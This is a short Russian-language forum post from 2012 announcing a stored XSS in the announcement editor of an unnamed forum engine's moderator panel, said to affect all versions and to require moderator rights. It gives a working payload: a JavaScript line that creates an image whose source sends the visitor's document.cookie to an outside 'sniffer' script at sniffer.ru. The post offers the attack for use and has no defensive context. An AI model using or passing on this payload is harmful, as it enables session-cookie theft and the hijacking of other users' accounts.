
29.02.2012, 04:17
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Активная XSS
Уязвимы все версий
Требуются права модератора
Идём
Панель модератора -> Управление разделами -> Объявление [ Редактировать]
Рабочий пример (проверка на работоспособность)
Эксплуатация обычная
Сообщение от None
img = new Image(); img.src = "http://sniffer.ru/s.php?"+document.cookie;
|
|
|